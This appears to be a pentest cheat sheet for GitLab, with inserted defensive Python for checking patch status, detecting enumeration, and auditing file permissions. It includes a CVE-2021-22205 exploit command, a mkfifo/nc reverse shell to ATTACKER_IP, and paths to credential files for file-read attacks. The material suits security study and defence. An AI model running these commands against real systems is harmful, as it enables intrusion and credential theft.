# GitLab

## Discovery

* Default ports: 80, 443
* Login page: `/users/sign_in`
* API: `/api/v4/`

***

## Version Enumeration

```bash
# In page source or footer
curl -s http://TARGET | grep 'gitlab'

# Via API (if accessible)
curl -s http://TARGET/api/v4/version
```
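As an added defensive example (not from the original page), the following Python takes the JSON body that `GET /api/v4/version` returns and decides whether the instance is at or above the CVE-2021-22205 fix releases listed further down this page (13.10.3, 13.9.6, 13.8.8). The sample response is constructed; the page only states the upper bound of the affected range, so anything older than the three fix branches is reported as not known to be patched.

```python
import json
import re
from typing import Optional, Tuple

# Fix releases for CVE-2021-22205 as stated on this page: 13.10.3, 13.9.6, 13.8.8.
# The page gives only the upper bound (< 13.10.3), so older branches are treated
# as "not known patched" rather than as definitely vulnerable.
FIXED_VERSIONS = [(13, 10, 3), (13, 9, 6), (13, 8, 8)]

# Constructed sample of what GET /api/v4/version returns (revision is a placeholder).
SAMPLE_RESPONSE = '{"version":"13.10.2","revision":"REVISION_PLACEHOLDER"}'


def parse_version(raw: str) -> Optional[Tuple[int, int, int]]:
    """Turn '13.10.2', '13.10.2-ee' or '13.10.2-pre' into (major, minor, patch)."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", raw.strip())
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_patched_22205(version: Tuple[int, int, int]) -> bool:
    """True if the version is at or above the fix release for its branch."""
    major, minor, patch = version
    # Anything newer than the newest fixed branch (13.10) carries the fix.
    if (major, minor) > (13, 10):
        return True
    # On one of the three backport branches: compare the patch level.
    for fmaj, fmin, fpatch in FIXED_VERSIONS:
        if (major, minor) == (fmaj, fmin):
            return patch >= fpatch
    # Any other branch below 13.10.3 is not known to be patched.
    return False


def assess_version_response(body: str) -> dict:
    """Parse the /api/v4/version JSON body and report patch status for CVE-2021-22205."""
    data = json.loads(body)
    raw = data.get("version", "")
    v = parse_version(raw)
    if v is None:
        return {"version": raw, "patched_cve_2021_22205": None, "note": "unparseable version"}
    return {"version": raw, "patched_cve_2021_22205": is_patched_22205(v)}


if __name__ == "__main__":
    print(assess_version_response(SAMPLE_RESPONSE))
```

Feed it the real body with `curl -s http://TARGET/api/v4/version` only if the endpoint answers unauthenticated on your instance; exposing it that way is itself worth reviewing, since it hands out the exact version.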

***

## Username Enumeration

GitLab rate limits enumeration by default (`config/initializers/devise.rb`):

```ruby
config.lock_strategy = :failed_attempts
config.maximum_attempts = 10
```

### Registration Page Enumeration

If registration is enabled, try registering with known usernames: the form returns an error when the username already exists.
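The Devise lockout above counts failed attempts per account, so a single client walking a username list through the sign-in or registration forms never trips it. As an added detection example (not part of the original page), this Python counts POSTs to `/users/sign_in` and `/users` per source IP over a sliding window, against constructed log lines shaped like GitLab's `production_json.log`; the field names `time`, `method`, `path` and `remote_ip` are an assumption about that log and should be checked against what your instance emits.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%S.%fZ"

# Endpoints whose POSTs reveal whether a username or e-mail exists (sign-in and registration).
WATCHED = {("POST", "/users/sign_in"), ("POST", "/users")}


def _line(ts: datetime, method: str, path: str, ip: str) -> str:
    """Build one constructed log line in the assumed production_json.log shape."""
    return json.dumps({
        "time": ts.strftime("%Y-%m-%dT%H:%M:%S.000Z"),
        "method": method,
        "path": path,
        "remote_ip": ip,
        "status": 200,
    })


# Constructed sample: 12 sign-in POSTs from one address within 24 seconds, plus
# ordinary traffic from a second address.
_BASE = datetime(2021, 4, 1, 10, 0, 0)
SAMPLE_LOG = "\n".join(
    [_line(_BASE + timedelta(seconds=2 * i), "POST", "/users/sign_in", "203.0.113.5")
     for i in range(12)]
    + [
        _line(_BASE + timedelta(minutes=5), "POST", "/users/sign_in", "198.51.100.9"),
        _line(_BASE + timedelta(minutes=6), "GET", "/explore/projects", "198.51.100.9"),
    ]
)


def find_probing_ips(log_text: str, threshold: int = 10,
                     window: timedelta = timedelta(minutes=1)) -> dict:
    """Return {ip: peak_count} for IPs that POST to watched endpoints >= threshold
    times inside any window-sized span. Blank lines are skipped."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if (rec.get("method"), rec.get("path")) in WATCHED:
            events[rec["remote_ip"]].append(datetime.strptime(rec["time"], TS_FMT))

    flagged = {}
    for ip, times in events.items():
        times.sort()
        start = 0
        # Classic two-pointer sliding window: advance start until the span fits.
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


if __name__ == "__main__":
    print(find_probing_ips(SAMPLE_LOG))
```

Tune `threshold` and `window` to normal login volume behind any shared NAT; a per-IP burst is the signal here, complementing the per-account lockout rather than replacing it.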

***

## Public Repositories

```bash
# Browse public projects
http://TARGET/explore/projects

# User profiles
http://TARGET/users/USERNAME
```

***


## Import Feature RCE

Older versions allow importing malicious project files:

1. Create malicious repo with hooks
2. Import via `New Project → Import`
3. Hooks execute on clone/push

***

## API Token Theft

If you have an arbitrary file read, these files contain the Rails secrets, database credentials and main configuration:

```bash
# GitLab Rails secrets
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

# Database config
/var/opt/gitlab/gitlab-rails/etc/database.yml

# GitLab config
/etc/gitlab/gitlab.rb
```
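Because those three files hold the material an attacker with file read is after, a quick defensive check is that none of them is readable by anyone but their owner. The following Python is an added example (not from the original page): `audit_secret_file` reports group/world read and write bits for the Omnibus paths listed above, and `demo_audit` runs the same check on two constructed files in a temporary directory so the logic can be exercised off a GitLab host.

```python
import os
import stat
import tempfile

# Secret-bearing files from this page (GitLab Omnibus layout).
SECRET_FILES = [
    "/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml",
    "/var/opt/gitlab/gitlab-rails/etc/database.yml",
    "/etc/gitlab/gitlab.rb",
]


def audit_secret_file(path: str) -> dict:
    """Report any group/other access bits on a secrets file.
    A missing file is reported as exists=False rather than treated as an error."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"path": path, "exists": False, "findings": []}
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if mode & stat.S_IRGRP:
        findings.append("group-readable")
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group/world-writable")
    return {"path": path, "exists": True, "mode": oct(mode), "findings": findings}


def audit_all(paths=SECRET_FILES) -> list:
    """Audit every path in the list; run as root on the GitLab host for real results."""
    return [audit_secret_file(p) for p in paths]


def demo_audit() -> list:
    """Constructed demo: one locked-down file (0600), one exposed file (0644),
    and one missing path, all inside a throwaway temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "secrets.yml")
        bad = os.path.join(d, "gitlab.rb")
        for p, mode in ((good, 0o600), (bad, 0o644)):
            with open(p, "w") as fh:
                fh.write("# constructed placeholder content\n")
            os.chmod(p, mode)  # explicit chmod so the umask does not matter
        return audit_all([good, bad, os.path.join(d, "missing.yml")])


if __name__ == "__main__":
    for result in demo_audit():
        print(result)
```

On a real host, run `audit_all()` as root; any non-empty `findings` entry means a lower-privileged local account, or a path-traversal bug in another service, can lift the same secrets the page lists.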

***

## Default Paths

| Path                    | Description            |
| ----------------------- | ---------------------- |
| `/opt/gitlab/`          | GitLab Omnibus install |
| `/var/opt/gitlab/`      | GitLab data            |
| `/var/log/gitlab/`      | Logs                   |
| `/etc/gitlab/gitlab.rb` | Main config            |

***

## Authenticated RCE (CVE-2021-22205)

**Affects:** GitLab CE/EE < 13.10.3, < 13.9.6, < 13.8.8

ExifTool metadata parsing RCE. Works if you can register an account.

```bash
# Exploit
python3 gitlab_13_10_2_rce.py -t http://TARGET -u username -p password -c 'id'

# Reverse shell
python3 gitlab_13_10_2_rce.py -t http://TARGET -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ATTACKER_IP 8443 >/tmp/f'
```

**PoC:** <https://www.exploit-db.com/exploits/49951>

***

## Username Enumeration

```bash
# Enumeration script
./gitlab_userenum.sh --url http://TARGET:8081/ --userlist users.txt
```

Registration page also reveals if username/email exists.

***

## CVEs

| CVE            | Description                       |
| -------------- | --------------------------------- |
| CVE-2021-22205 | Auth RCE via ExifTool (< 13.10.3) |
| CVE-2021-22214 | SSRF via webhook                  |
| CVE-2020-10977 | Arbitrary file read               |
| CVE-2018-19571 | SSRF + CRLF                       |
